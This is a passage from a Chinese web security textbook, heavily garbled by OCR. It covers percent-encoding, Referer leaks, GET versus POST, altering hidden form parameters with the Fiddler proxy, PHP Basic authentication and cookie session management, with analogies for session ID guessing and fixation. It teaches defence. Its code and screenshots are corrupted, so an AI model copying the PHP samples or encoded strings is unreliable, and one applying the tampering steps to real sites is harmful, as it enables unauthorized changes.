Content-Type 为 发 送 值 的 MIME 类 型 ， 可 通过 HTML 的 form 元 素 设 置 。 默 认为 application/ 
x-Www-form-unlencoded。 这 种 类 型 的 格式 为 ,“ 名 称 = 值 ”的 组 合 通过 & 相连， 其中， 名 称 和 值 
都 经 过 了 百 分 号 编码 ( Percent-Encoding )。 
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多 百 分 号 编码 

中 文 和 特殊 符号 等 不 能 直接 用 于 URL， 而 如 果 要 将 它们 用 在 URL 上 的 话 就 需要 经 过 百 分 号 
编码 。 百 分 号 编码 是 将 字符 以 字 节 为 单位 转换 成 %xx 的 形式 。xx 为 该 字 节 的 十 六 进 制 写法 。 例 
如 ， 将 图 3-8 中 输入 的 文字 “ 德 ”进行 UTF-8 编码 ， 可 得 到 E5 BE B3 字 节 列 ， 百 分 号 编码 后 即 
为 %E5%BE%B3。 

根据 百 分 号 编码 的 规则 ， 空 格 应 为 %20， 但 在 application/x-www-form-unlencoded 的 情况 
下 ， 空 格 则 被 特殊 处 理 为 +*。 所 以 , 将 “maprogrammer” 进 行 百 分 号 编码 的 话 ， 结 果 就 为 
I%27m+a+programmer ( 撤 号 变 成 了 %27 )。 














@ Referer 

请 求 消息 中 有 时 含有 Referer 头 信息 。 它 能 告诉 我 们 当前 请 求 是 从 哪个 页 面 链接 过 来 的 ， 值 
就 是 那个 页 面 的 URL。 除 了 通过 form 元 素 发 送 的 请 求 ，a 元 素 生 成 的 链接 或 img 元 素 的 图 像 等 
也 会 产生 Referer 头 信息 。 

Referer 头 信息 有 时 是 提升 安全 性 的 帮手 ， 有 时 却 能 成 为 问题 之 源 。 

Referer 有 益 的 一 面体 现在 ， 当 我 们 为 了 确保 安全 性 而 主动 检验 Referer 头 信息 时 ， 通 过 查看 
Referer， 能 够 确认 应 用 程序 的 跳 转 是 否 跟 预期 一 样 。 但 是 ， 同 其 他 头 信 息 一 样 ，Referer 也 能 
访问 者 本 人 通过 Fiddler 之 类 的 工具 修改 ， 或 者 被 浏览 器 插件 和 其 他 安全 方面 的 软件 修改 或 删除 ， 
所 以 未 必 会 正确 显示 链接 的 来 源 2。 

当 URL 中 包含 敏感 信息 时 ，Referer 就 可 能 会 引发 安全 问题 。 比 如 ，URL 中 包含 的 会 话 ID 
通过 Referer 泄漏 给 外 界 ， 从 而 使 自己 的 身份 被 他 人 恶意 冒名 顶替 ， 就 是 一 个 典型 的 案例 。 具 体 
情况 将 在 4.6.3 节 详 述 。 

要 点 ”URL 中 包含 重要 信息 时 ， 就 有 被 Referer 头 信息 泄 密 的 风险 。 































































































令 GET 和 POST 的 使 用 区 别 
如 何 区 别 使 用 GET 方法 和 了 POST 方法 呢 ? 
HTTP 1.1 协议 的 规范 文档 RFC26163 的 第 9 章 和 第 15 章 中 ， 记 载 了 区 别 使 用 两 者 的 注意 点 。 
GET 方法 仅 用 于 查阅 (获取 资源 ) 
GET 方法 被 认为 没有 副作用 
发 送 敏感 数据 时 应 使 用 POST 方法 
这 里 出 现 了 “副作用 ”这 个 概念 。 副 作用 是 指 ， 除 了 获取 资源 ( 内容 ) 以 外 的 其 他 操作 。 比 
如 ， 追 加 /更 新 /删除 服务 器 端的 数据 、 购 买 商 品 、 注 册 /删除 用 户 等 操作 。 换 言 之 ， 更 新 类 的 




















中 百 分 号 编码 属于 URL (URI ) 的 规范 ，application/x-www-form-unlencoded 属于 HTML 的 规范 ， 所 以 两 者 存在 细微 
差别 。 

关于 使 用 Fiddler 来 改变 参数 ， 后 面 讲 hidden 参数 时 会 进行 详 述 。 

http://tools.ietf.org/html/rfc2616 


OO 
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页 面 必须 使 用 POST 方法 。 
另外 ，GET 方法 使 用 的 是 URL 后 紧 跟 查 询 字 符 串 的 形式 来 传递 参数 ， 但 由 于 浏览 器 和 服务 
器 能 够 处 理 的 URL 长 度 是 有 限 的 了 "， 所 以 ， 当 传递 的 信息 量 很 大 时 ,使 用 POST 方法 更 安全 。 
敏感 信息 应 使 用 POST 发 送 ， 这 是 因为 GET 方法 有 下 列 风险 。 


URL 中 指定 的 参数 经 由 Referer 泄漏 
URL 中 指定 的 参数 残留 在 访问 日 志 ( Access Log ) 中 
为 解决 以 上 问题 ， 当 所 发 送 的 请 求 符合 以 下 任 一 条 件 时 就 应 使 用 POST 方法 ， 都 不 符合 时 才 
使 用 GET 方法 。 
请 求 中 包含 数据 更 新 等 副作用 时 
发 送 敏感 信息 时 
发 送 的 信息 量 很 多 时 
人 hidden 参数 能 够 被 更 改 
继续 刚才 的 输入 表单 (图 3-8 )， 点 击 “ 确 认 ” 按 钮 后 浏览 器 的 页 面 如 图 3-10 所 示 。 




















3-10 ”确认 画面 














| 已 | 加 | 
GO [Btwo/eonpeipayaroospnp [3[x|Esnm Pr 
容 收 5 天 | 碟 确 人 [ |: TAO 








姓名 ， 德 丸 洁 ES 
邮箱 地 址 ，toku@example jp <input type="hidden" name="name" value=" 德 丸 洗 "> 
性 别 : 男 


<input type="hidden" name="mail" 
value="toku@example.jp"> 
<input type="hidden" name="gender" value=" 男 "> 




















虽然 在 页 面 上 看 不 到 ， 但 用 户 在 前 页 面 输入 的 值 会 以 hidden 参数 的 形式 在 HTML 源 代码 中 
记录 下 来 。 

与 FTP 协议 或 telnet 协议 不 同 ，HTTP 协议 无 法 记忆 客户 端的 当前 状态 。 这 种 特性 被 称 为 
HTTP 的 无 状态 性 ”。 因 此 ， 状 态 的 记忆 和 需要 借助 响应 (HTML ) 中 的 hidden 参数 。 

在 页 面 上 点 击 “注册 ”按钮 后 ，hidden 参数 将 被 发 送 给 Web 服务 器 。 此 时 ， 在 向 服务 器 发 
送 数据 之 前 ， 我 们 可 以 尝试 使 用 Fiddler 改变 hidden 参数 的 值 。 

首先 ， 在 Fiddler 的 Rules 菜单 中 ， 选 择 “Automatic Breakpoints”-“Before Requests”( 图 3-11 )。 








Q 虽然 RFC2616、RFC1738 及 RFC3986 中 并 未 规定 URL 的 长 度 上 限 ， 但 各 个 浏览 器 都 存在 上 限 值 。 
@) 与 此 相反 ， 像 FTP 和 telnet 这 种 能 够 记忆 当前 状态 的 特性 ， 巴 作 有 状态 性 。 
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合 图 3-11 在 Rules 菜单 中 选择 “Automatic Breakpoints”-“Before Requests” 


吕 Fiddler - HTTP Debugging Proxy 


Eile Edit Tools Yiew Help 
Hide Image Requests treaming [i AutoDecode | 时 Process Fil 










































Hide HTTPS CONNECTs jcs | 吴 Inspectors | 大 putoResponder | 
Automatic Breakpoints 上 Before Requests Fii 
Customize Rules,,， Ctrl+R After Responses NS Alt+F11 












Require Proxy Authentication 本 | 二 Se 
Apply GZIP Encoding Ignore Images 
YV RemovenAllEncodings on eae 
Hide 304s Length: 74 
xample. jp 
Request Japanese Content no-cache 
User-Agents » 5%BEXB3%E 4%BS%BSHESNBSHASMmai 1=tok! 





四 









Performance 











此 状态 下 ， 点 击 “ 注 册 ” 按 钮 后 ，Fiddler 的 界面 就 变 成 了 图 3-12 所 示 的 情形 ( 选择 右 侧 上 
方 的 “ oe 二 Fiddler 截获 到 了 浏览 器 的 请 求 消息 ， 并 且 还 未 将 其 传送 给 服务 右 。 


会 图 3-12 Fiddler 接收 浏览 器 的 请 求 消息 


[ 泪 Fiddler - HTTP Debugging Proxy [el 晶 
File Edit Rules Iools Yiew Help 

W)Comment fy Reissue X Remove ”ResumeAll | 时 Streaming 区 Autonecode | @@ acess Filter 前 Find 区 Save |s Launch IE 
Web Sessions | << | statisties AutoResponder | WR Request Bulder | ] Log | 回 Fiters | = Tmelne 
这 Protocol Host URL Headers | TextView Hexwiew | Auth | Raw | XML 


国 ! 200 HTTP Sn jp 人 -002， et 
200 
















































Result 






le. -003.php 
ee ip 全 二 -004, 本 











| value 
| 德 丸 浩 
toku@example,ip 


















Caching | 


Break on Response 具 量 


ImageView | HexView 










Transformer | Headers 


Privacy |[Raw | XML 












[ Find,., I Wiew in Notepad ] 


潍 Capturing 去 齐 Processes 曙 113 http: /fexample,jp/31131-004.php 
一 


编辑 方 框 中 的 内 容 ， 如 图 3-13 所 示 。 
会 图 3-13 ”变更 浏览 器 的 请 求 消息 
























































re 


Transformer | Headers | TextYiew | ImageView | HexView | WebView | Auth | Caching | Privacy 


接 下 来 ， 点击 “Run to Completion” 按 钮 ， 变 更 后 的 请 求 就 会 被 发 送 给 服务 器 。 此 时 ,IE 上 
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会 显示 图 3-14 的 页 面 ( 虽然 显示 了 “成 功 注 册 ” 的 消息 ， 但 
图 3-14 浏览 器 显示 了 变更 后 的 信息 


山中 


将 











[ 你 注册 成 功 - Windows Internet Explorer | 加 | % 
GO | 加 http://examplejp/31731-004.php ~ | > | x | | 加 Bing Pr | 





次 收 若 夫 “| 咎 法 各 成 | 1: IRo> 


姓名 : 德 丸 玛 利 亚 
邮箱 地 址 ， maria(@example.ip 
性 别 ， 女 


注册 成 功 














以 上 试验 说 明 , 在 HTTP 层面 ， 文 本 框 、 单 选 框 的 选择 项 ， 
在 浏 览 器 上 无 法 改变 的 值 ( 如 单 选 框 的 选择 项 和 hidden 参数 ) 也 能 














要 点 ”浏览 器 发 送 的 值 都 能 够 被 变更 


























会 有 被 Fiddler 等 代理 工具 实施 算 改 和 攻击 的 风险 。 
令 将 hidden 参数 的 更 改 比 作 对 话 





接 下 来 让 我 们 以 对 话 的 形式 来 再 现 一 下 刚才 变更 hidden 参数 的 情形 。 


顾客 与 店员 的 对 话 

















SEE 
想 要 申请 会 员 。 


店员 ; 请 提供 您 的 姓名 、 邮 箱 地址 、 性 别 ( 男 或 女 )。 


时 
ul 
sh 
































顾客 : 不 对 。 姓 名 为 德 丸 玛 利 3 


3 











实 上 并 没有 进行 注册 处 理 





顾客 : 姓名 为 德 丸 浩 ， 邮 箱 地 址 为 tokumaru@example.jp， 性 别 为 











p 箱 地 址 为 maria@example.jp， 性 另 








— 
0 


以 及 hidden 参数 都 被 同等 对 待 ， 





通过 实际 体验 hidden 参数 的 变更 可 以 得 知 ， 一 旦 处 理 hidden 参数 的 地 方 存在 安全 隐患 ， 就 


店员 : 姓名 为 德 丸 玛 利 亚 ， 邮 箱 地 址 为 maria@example.jp， 性 别 为 女 。 您 的 会 员 身份 已 注册 完毕 。 











人 hidden 参数 的 优点 


< 
A 
CD 店员 好 的 。 姓 名 为 德 丸 浩 ， 邮 箱 地 址 为 tokumaru@example jp， 性 别 为 
A 


前 面 介绍 了 hidden 参数 的 一 些 隐 患 ， 那 么 hidden 参数 有 什么 优点 呢 ? 虽然 hidden 参数 的 值 

















能 被 用 户 自己 改写 ,但 在 面 对 信 息 泄漏 以 及 被 第 三 方 算 改 等 危险 时 ，hidder 参数 却 坚 不 可 推 。 
与 hidden 参数 形成 鲜明 对 比 的 是 后 面 将 要 介绍 的 Cookie 和 会 话 ( Session ) 
会 话 变量 的 缺点 是 容易 招致 会 话 固定 攻击 。 尤 其 是 在 尚未 登录 、 并 且 又 使 用 了 地 域 





























Cookie 和 

















型 域名 的 情 
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况 下 ， 受 到 Cookie Monster Bug 的 影响 ， 根 本 就 没有 有 效 的 办 法 来 防止 会 话 变量 的 泄漏 (参考 
4.6.4 市 )。 

因此 ， 像 认证 和 授权 信息 这 样 需 谨防 被 用 户 自 己 更 改 的 信息 ,应 当 保 存在 会 话 变量 中 ( 参考 
5.1 节 和 5.3 节 )。 而 除 此 以 外 的 信息 ， 则 首先 应 考虑 能 否 保 存在 hidden 参数 中 。 特 别 是 在 登录 前 
的 状态 下 ， 由 于 不 存在 与 认证 、 授 权 相 关 的 信息 ， 因 此 ， 原 则 上 要 避免 使 用 会 话 变 量 ， 而 是 应 该 
使 用 hidden 参数 ， 从 而 来 防止 信息 泄漏 等 。 





无 状态 的 HTTP 认证 

HTTP 支持 认证 功能 。HTTP 认证 根据 实现 方式 可 细 分 为 Basic 认证 、NTLM 认证 和 Digest 
认证 等 。 正 如 HTTP 是 无 状态 的 协议 一 样 ，HTTP 认证 同样 也 是 无 状态 的 。 

下 面 让 我 们 看 一 下 HTTP 认证 中 最 简单 的 Basic 认证 。 








多 体验 Basic 认证 

Basic 认证 的 概要 如 图 3-15 所 示 。Basic 认证 下 ， 当 浏览 器 请 求 一 个 需要 认证 的 网 页 时 ， 服 
务 器 会 先 向 浏览 器 返回 “401 Unauthorized (未 认证 》 状态 码 。 浏 览 器 收 到 此 状态 码 后 ,会 显示 
要 求 输入 ID 和 密码 的 画面 ， 然 后 再 将 输入 的 ID 和 密码 添加 到 请 求 信息 中 ， 再 次 向 服务 器 发 送 。 


3-15 ”Basic 认证 的 概要 


GET /31/31-010.php HTTP/1.1 
HTTP/1.1 401 Unauthorized 


























中 访问 需要 认证 的 网 页 


















ion 的 服务 器 examplejp 要 并 用 户 






下 以 不 安全 的 方式 发 送信 连接 


2 浏览 器 询问 用 户 名 和 密码 




















(93) 再 次 发 送 附 带 认证 信息 的 请 求 





GET /31/31-010.php HTTP/1.1 
Authorization: Basic qXN1Lc]jE6cGFzczE= 
HTTP/1.1 200 OK 


Basic 认证 大 多 通过 设置 Web 服务 器 来 实现 ， 而 也 能 通过 PHP 来 编写 代码 。 以 下 为 使 用 
PHP 的 Basic 认证 的 例子 。 


也 本 次 请 求 得 到 了 文档 
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代码 清单 “/31/31-010.php 





<?php 
$user = @$ SERVER['PHP AUTH USER']; 
$Spass = @$ SERVER['PHP AUTH PW']; 





if (! $user || ! $pass) { 
header ('HTTP/1.1 401 Unauthorized'); 
header ('WHW-Authenticate: Basic realm="Basic Authentication Sample"'); 
echo " 请 输入 用 户 名 和 密码 " ; 
exit; 
} 


全 各 























<body> 
已 通过 认证 <br> 


























2 :<?php echo htmlspecialchars ($user, ENT NOQUOTES, 'UTF-8'); ?> 
<br> 
密码 :<?php echo htmlspecialchars ($pass, ENT NOQUOTES, 'UTF-8'); ?> <br></body> 








以 上 代码 仅 用 于 试验 ， 所 以 ID 和 密码 输入 任意 值 都 能 通过 认证 ， 而 ID 或 密码 任意 一 方 为 
空 日 就 会 认证 失败 。 认 证 失败 时 ,按照 Basic 认证 的 规定 会 输出 以 下 头 信息 。 





HTTP/1.1 401 Unauthorized 


WWW-Authenticate: Basic realm="Basic Authentication Sample" 











如 果 要 在 虚拟 机 上 运行 ， 可 以 点 击 /31/ 菜单 的 “31-010: Basic 认证 试验 ”。 第 一 次 请 求 时 浏览 
器 没有 发 送 ID 和 密码 ， 所 以 31-010.php 返回 了 401 状态 码 。 这 时 ，HTTP 信息 的 截图 如 图 3-16 所 
示 。 浏 览 器 收 到 401 状态 码 后 ， 就 会 显示 要 求 输入 Basic 认证 的 ID 和 密码 的 对 话 框 (图 3-17 )。 


图 3-16 返回 401 状态 码 的 HTTP 消息 


























[器 Fiddler - HTTP Debugging Proxy eel x 
Eile Edt Rules Tools View Help sl 
W)Comment #3 Reissue X Remove » Resume All | 种 streaming 民 | wocess Filter 前 Find 加 5ave | 古 Launch IE 区 
ED Sn << || © statisties| WM Inspectors 芒 AutoResponder | GW Request Buider [ 辐 Log | 回 Fiters | = Tmeine 
类 Result Protocol Host URL 





























Headers | Textview | WebForms | Hexview | auth |[Raw | xmL | 


1 01 HIP example,jp /31/31-010.php 











Accept- 和 deflat 


A 0 oobi MSIE 7.0; Windows NT 6.0; GTB6.5; SLCC1; .NI 





CH nT | ; 








[en I View in Notepad ] 
Transformer | Headers | Textyiew | Imageyiew | HexView | Webview | Auth | Caching | Privacy 
Raw | xML | 





x-Powered-BY: PHP/5.3.2-1ubuntu4. 

mA tent eate: Basic reaineHbasic Authentication Sample” eo— 
Vary: Accept-Encoding 

content-Length: 45 

Kecp-Allve: timeoutsts, max=100 

Iconnection: Keep-A 

lcontent-Type: Ee charset=UTF-8 


和 2 一 扫 名 上 刻 双 一 下 力 必 要 忒 字 


[ Find,.. I Wiew in Notepad ] 


史 Capturing “三 AlProcesses 111 http:/jexample,jp/31/31-010,php 
人 
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图 3-17 Basic 认证 的 ID 和 密码 输入 对 话 框 


LE 





者 
Windows 安全 





位 于 Application 的 服务 器 examplejp 要 求 用 户 名 和 密码 。 


警告 : 此 服务 器 要 求 以 不 安全 的 方式 发 送 您 的 用 户 名 和 密码 (没有 安全 连接 
的 基本 认证 )。 


[三 一 | | 用 户 名 | 
| 二 
= 


ke | 


Wm ID“user1” 和 密码 “pass1”， 输 入 完毕 后 点 击 OK 按钮 ，HTTP 请 
求 消息 再 次 被 发 送 。 这 次 会 附带 以 下 的 Authorization 头 信息 。 















































Authorization: Basic dXNlcjE6cCGFZCZE= 














Basic 后 面 的 字符 串 内 容 ， 是 ID 和 密码 以 冒号 相隔 组 成 的 字符 串 、 再 经 过 Base64 编码 后 
的 结果 。 可 以 使 用 Fiddler 的 Encoder 功能 进行 解码 确认 。 在 Fiddler 的 Tools 菜单 中 选择 “Text 
Encode/Decode”， 就 会 显示 出 TextWizard 对 话 框 ,然后 将 dXNlcjE6cFGzczE= 复制 进去 ， 点击 对 
话 框 左边 的 “From Base64” 单 选 按钮 ( 图 3-18 )， 就 能 在 画面 中 央 的 文本 框 中 看 到 “userl:pass1” 


字符 串 。 


图 3-18 使 用 Fiddler 附带 的 TextWizard 来 解码 Base64 


TextWizard [16 => 11 chars] ea 

















dXNIcjE6cGFzczE= 





now Ee] 


®) From Base64 


而 这 时 ， 浏览 右上 显示 的 就 是 下 图 所 示 的 画面 。 可 以 看 出 ，PHP 脚本 成 功 读 取 了 Basic 认证 
的 ID 和 密码 。 








图 3-19 ”认证 成 功 
[ 生 httpV/examplejp/31/31-010.php - Windows Internet Explorer | 名 | x 


@O-: 加 http://examplejp/31/31-010.php "| 宁 |X i 吕 Bing Pr 




















次 收藏 夫 | 乱 http://examplejp/31/31-010.php 国 ; 工 R(O) ~ 








密码 : passl 














了 


Basic 认证 成 功 一 次 以 后 ， 再 向 http://example.jp/31/ 下 面 的 目录 发 送 请 求 时 ， 浏览 器 就 会 
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自动 附带 Authorization 消息 头 。 因 此 ， 认 证 对 话 框 只 在 最 初 的 时 候 显示 一 次 ， 看 上 去 认证 状态 
似乎 被 记 住 了 ， 但 实际 上 每 次 请 求 时 都 会 发 送 ID 和 密码 ， 认 证 状态 并 没有 被 保存 在 任何 地 方 。 
换言之 ，Basic 认证 也 是 无 状态 的 。 而 正 是 因为 Basic 认证 的 无 状态 性 ， 所 以 也 就 不 存在 注销 
( Logout ) 的 概念 。 

Basic 认证 可 以 被 比喻 为 银行 业务 柜台 的 对 话 。 

















顾客 : 请 帮 我 查 一 下 账户 余额 。 

柜员 : 请 提供 您 的 银行 卡号 和 密码 。 

顾客 : 请 帮 我 查 一 下 账户 余额 。 卡 号 为 12345， 密 码 为 9876。 
: 余额 为 5 万 元 。 




















顾客 : 请 向 卡号 23456 转账 3 万 元 。 卡 号 为 12345， 密 码 为 9876。 


柜员 : 转账 完毕 。 








DOOV VY 

















顾客 和 柜员 之 间 的 交流 是 无 状态 的 。 无 关上 下 文 ， 顾 客 每 一 次 都 要 提供 所 有 必要 的 信息 。 
此 ， 就 算 一 开始 就 进行 转账 也 能 正常 处 理 。 


专栏 ; 认证 与 授权 
































至 此 我 们 未 经 特别 说 明 就 一 直 使 用 着 “认证 ”( Authentication ) 这 个 术语 。 认 证 是 指 ，i 
一 些 方 法 手段 来 确认 操作 者 确实 是 其 本 人 。Web 应 用 常见 的 认证 方法 除了 Basic 认证 ， 还 有 i 
过 HTML 表单 使 用 户 填写 ID 和 密码 的 表单 认证 ， 以 及 使 用 SSL 客户 端 证 书 的 客户 端 认 证 等 。 
与 认证 相对 的 术语 是 “授权 ”( Authorization )。 授 权 是 指 ， 授 予 已 经 通过 认证 的 用 户 一 些 权 
限 。 具 体 表现 为 ， 让 用 户 能 够 对 数据 进行 阅览 / 更新/ 删除、 在 线 转账 、 在 线 购物 等 。 
于 页 面 上 并 不 会 特意 区 分 认证 与 授权 ， 所 以 用 户 很 容易 将 两 者 混为一谈 。Web 应 用 的 普 
遍 流程 为 ， 在 用 户 输入 ID 和 密码 通过 认证 以 后 ， 立 刻 就 会 被 授予 一 些 权限 。 但 是 ， 在 开发 应 用 
及 考虑 安全 性 时 ， 最 好 能 明确 认证 与 授权 这 两 者 的 区 别 ， 并 养 成 区 别 使 用 的 习惯 。 

关于 认证 和 授权 ，5.1 节 和 5.3 节 会 分 别 进行 详 述 。 
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Cookie 与 会 话 管 理 

前 面 我 们 已 经 提 到 ， 由 于 HTTP 协议 的 无 状态 性 ， 服 务 器 端 不 能 保存 客户 端的 状态 。 但 是 ， 
在 应 用 程序 中 ,保持 客户 端的 状态 却 是 相当 和 常见 的 需求 。 

比如 ， 在 线 购物 网 站 中 的 “购物 车 ”就 是 一 个 典型 的 案例 。 购 物 车 记 住 了 用 户 在 哪些 商品 上 
点 击 了 “购买 ”按钮 。 

另外 ， 记 住 用 户 登 录 后 的 认证 状态 也 是 一 种 常见 的 需求 。 虽 然 使 用 HITP 认证 就 能 使 浏览 器 
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记 住 ID 和 密码 ， 但 不 使 用 HTTP 认证 时 ， 记 忆 认 证 状态 的 任务 就 落 在 了 服务 器 身上 。 而 像 这 种 
记忆 应 用 程序 状态 的 功能 就 叫 作 “会 话 管理 ”。 

为 了 实现 会 话 管理 ，HTTP 引入 了 名 为 Cookie 的 机 制 。Cookie 相当 于 服务 器 下 达 给 浏览 
的 命令 ， 让 其 记 住 发 送 给 它 的 “名 称 = 变量 ”这 种 格式 的 值 。 由 于 Cookie 会 被 用 于 实现 会 话 管 
理 ， 因此， 下 面 就 让 我 们 结合 PHP 中 的 会 话 管理 来 对 其 进行 说 明 。 

下 面 的 示例 应 用 是 用 户 认 证 和 用 户 信息 显示 的 简化 版 。 由 以 下 3 个 页 面 构成 : ID 和 密码 输入 
页 面 (31-020.php )、ID 和 密码 认证 页 面 (31-021.php )、 个 人 信息 (ID ) 显示 页 面 (31-022.php )。 
在 虚拟 机 上 执行 时 ， 可 在 /31/ 菜单 中 点 击 “31-020: 使 用 Cookie 的 会 话 管理 ”。 


代码 清单 ”/31/31-020.php 











<?php 
session start (); // 会 话 开 始 

时 六 

<html> 

<head><title> 请 登录 </title></head> 

<body> 

<form action="31-021.php" method="POST"> 
名 <input type="text" name="ID"><br> 























密码 <input type="password" name="PWD"><br> 
<input type="submit" value=" 登录 "> 
</form> 

</body> 

</html> 





代码 清单 ”/31/31-021.php 





<?php 
session start (); // 会 话 开始 
$id = @$ POST['ID']; 
$pwd = @$ POST['PWD']; 
// 名 和 密码 中 任意 一 项 未 输入 时 则 登录 失败 
if ($id == ' || $pwa == '') { 
die(' 登录 失败 ' ) ; 
} 
$_SESSION['ID'] = $id; 
?> 
<html> 
<head><title> 登录 </title></head> 
<body> 
登录 成 功 
<a href="31-022.php"> 我 的 账号 </a> 
</body> 
</html> 
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代码 清单 ”/31/31-022.php 





























<?php 

session start(); // 会 话 开始 

$id = $ SESSION['ID']; 

于 "(SLd 所 es ， 

diel ,请 登录 ， 

} 
?> 
<html> 
<head><title> 我 的 账号 </title></head> 
<body> 

1! 冯 :<?php echo htmlspecialchars ($id, ENT NOQUOTES, 'UTF-8'); ?> 
</body> 
</html> 








同 Basic 认证 的 例子 一 样 ， 随 便 输入 ID 和 密码 就 能 成 功 通过 认证 。 页 面 跳 转 流 程 如 下 图 所 示 。 
3-20 ”示例 应 用 的 页 面 跳 转 
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最 初 显示 31-020.php 的 ID 和 密码 输入 页 面 时 ， 返 回 的 响应 消息 如 下 ( 仅 列 出 要 点 )。 





HTTP/1.1 200 OK 


Set-Cookie: PHPSESSID=gg5144avrhmdiaelvh80141b53; path=/ 
Content-Length: 279 


Content-Type: text/html; charset=UTF-8 


<html> 
<head><title> 请 登录 </title></head> 
<body> 【 以 下 略 】 


























通过 Set-Cookie 响应 头 信 息 ，Web 服务 器 向 浏览 需 下 达 了 记 住 此 Cookie 值 的 指示 。 
在 登录 页 面 上 输入 ID 和 密码 后 点 击 “ 和 登录” 按钮， 浏览 器 就 会 向 服务 器 发 送 如 下 请 求 。 








POST /31/31-021.php HTTP/1.1 

Referer: http://example.jp/31/31-020.php 
Content-Type: application/x-www-form-urlencoded 
Host: example.jp 

Content-Length: 18 

Cookie: PHPSESSID=gg5144avrhmdiaelvh80141b53 


ID=userl&PWD=passl 
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记 住 了 Cookie 值 的 浏览 器 ， 从 此 再 向 相同 网 站 (example.jp ) 发 送 请 求 时 ， 就 会 同时 发 送 此 
Cookie 值 (PHPSESSID=… )。Cookie 可 以 设置 有 效 期 限 ， 没 有 设置 有 效 期 限 的 Cookie 会 在 浏览 
顺 被 关闭 之 前 一 直 有 效 。 

Cookie 中 PHPSESSID 的 值 被 称 为 会 话 ID， 它 是 访问 会 话 信 息 的 关键 。31-021.php 中 ， 认 证 
成 功 后 的 用 户 ID 话 变量 $_SESSTON['ID'] 中 。 随 后 程序 在 31-022.php 中 取得 了 此 
用 户 古 。 保 存在 会 话 变量 中 的 信息 ， 在 会 话 失效 之 前 随时 都 能 被 访问 。 

















多 使 用 Cookie 的 会 话 管理 
Cookie 能 让 浏览 器 记忆 少量 数据 ， 但 保存 应 用 程序 的 数据 时 几乎 不 会 使 用 Cookie， 理 由 如 下 。 


Cookie 能 保存 的 值 的 数量 和 字符 串 长 度 有 限 
Cookie 的 值 能 被 用 户 自己 看 到 或 更 改 ， 所 以 不 适用 于 存储 敏感 信息 
因此 ， 可 以 采用 在 Cookie 中 保存 类 似 于 “受理 编号 ”的 会 话 ID， 实 际 对 应 的 值 则 保存 在 服 
务 器 端的 方法 。 这 种 方法 被 称 为 “使 用 Cookie 的 会 话 管理 ”"， 目 前 有 着 非常 广泛 的 应 用 。PHP 等 
主流 Web 应 用 开发 工具 中 已 经 提供 了 这 种 会 话 管理 的 机 制 。 
会 话 管 理 的 拟人 化 解说 
将 解说 Basic 认证 时 使 用 的 银行 窗口 业务 的 比喻 ， 转 换 为 会 话 管理 版 本 ， 其 详情 如 下 。 
































顾客 : 你 好 。 
柜员 : 您 的 受理 编号 为 005。 请 提供 您 的 银行 卡号 和 密码 。 
顾客 : 受理 编号 为 005。 卡 号 为 12345， 密 码 为 9876， 请 确认 。 











柜员 : 身份 核实 完毕 。 

页 客 ; 受理 编号 为 005。 请 帮 有 我 查 下 余额 。 

柜员 : 余额 为 5 万 元 。 

顾客 : 受理 编号 为 005。 请 向 卡号 23456 的 账户 转账 3 万 元 。 


柜员 转账 完毕 。 
































对 话 中 的 受理 编号 即 为 会 话 ID。 顾 客 每 次 都 要 向 柜员 汇报 受理 编号 ， 正 如 浏览 器 每 次 都 自 
动向 服务 器 发 送 Cookie 一 样 。 

但 是 ，005 这 个 受理 编号 多 少 让 人 感到 不 安 。 因 为 随便 换 一 个 相近 的 号 码 ， 就 有 可 能 假冒 他 
人 。 比 如 像 下 面 这 样 。 
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恶人 : 你 好 。 

总 柜员 : 您 的 受理 编号 为 006。 请 提供 您 的 银行 卡号 和 密码 。 

恶人 将 受理 编号 减 去 1 变 成 了 005。 假 设 受理 编号 为 005 的 顾客 已 经 通过 了 身份 核实 。 
人 驾 下 人 受理 编号 为 005。 请 向 卡号 99999 的 账户 转账 3 万 元 。 


CO 柜员 转账 完毕 。 


仅仅 更 改 了 受理 编号 ， 就 能 成 功 使 用 他 人 的 账户 进行 转账 。 

由 此 可 见 ， 会 话 ID 不 能 使 用 连续 的 数字 ， 而 应 当 使 用 位 数 足 够 长 的 随机 数 ， 刚 才 看 到 的 
PHPSESSID 的 值 有 26 位 也 正 是 出 于 这 个 原因 。 综 上 ,会话 ID 需要 满足 如 下 需求 。 

需求 1: 会 话 ID 不 能 被 第 三 方 推测 

需求 2: 会 话 ID 不 能 被 第 三 方 动 持 

需求 3: 会 话 ID 不 能 向 第 三 方 泄漏 


需求 1 的 会 话 ID 不 能 被 推测 ， 本 质 上 要 求 的 是 随机 数 的 质量 问题 。 如 果 随 机 数 存在 规律 性 ， 
就 能 够 通过 收集 足够 多 的 会 话 ID 来 推测 别人 的 会 话 ID。 因 此 ,会话 ID 的 随机 数 可 以 使 用 密码 
学 级 别 的 伪 随 机 数 生 成 器 生成 ， 伪 随机 数 生成 器 的 范例 在 电子 政府 推荐 密码 列表 ”中 有 所 记载 。 

但 是 实际 开发 的 过 程 中 , 会话 ID 并 非 自 己 手动 生成 ， 而 应 该 使 用 Web 应 用 开发 工具 ( PHP、 
Tomcat、.NET 等 ) 提供 的 会 话 ID。 这 些 主 流 开发 工具 经 受 着 全 球 人 研究 者 的 调查 ， 因 此 ， 即 使 生 

会 话 ID 的 处 理 有 问题 ， 也 一 定 会 被 作为 安全 隐患 而 得 到 改善 。 以 笔者 多 年 诊断 安全 隐患 的 经 
验 来 看 ， 自 己 实现 的 会 话 管理 机 制 中 混入 安全 隐患 的 例子 不 在 少 , 数 . 所 以 务必 不 要 自己 来 实现 会 
话 管理 机 制 。 关 于 会 话 管理 不 完善 所 导致 的 安全 隐患 问题 , 4.6 节 中 会 进行 细 述 。 




































































































































































要 点 ”使 用 开发 工具 提供 的 会 话 管理 机 制 。 




















接着 ， 关 于 需求 2 的 会 话 ID 不 能 被 动 持 ， 最 初 使 用 银行 窗口 业务 的 比喻 来 说 明 的 流程 中 其 
实 存在 安全 问题 。 具 体 请 看 下 面 对 话 中 的 攻击 流程 。 


OD http://www.cryptrec.go.jp/list.html 
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2 柜员 .; 您 的 受理 编号 为 9466ir8fgmmk1gn6raeo7ne71。 请 提供 您 的 银行 卡号 和 密码 。 
恶人 暂时 离开 柜台 并 等 竺 来客。 有 顾客 进入 银行 时 ， 恶 人 冒充 银行 柜员 向 顾客 搭 话 。 
: 您 的 受理 编号 为 9466ir8fgmmk1gn6raeo7ne71。 
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顾客 : 我 的 受理 编号 为 9466ir8fgmmk1gn6raeo7ne71。 
柜员 : 请 提 供 您 的 银 和 行 卡号 和 密 ys 


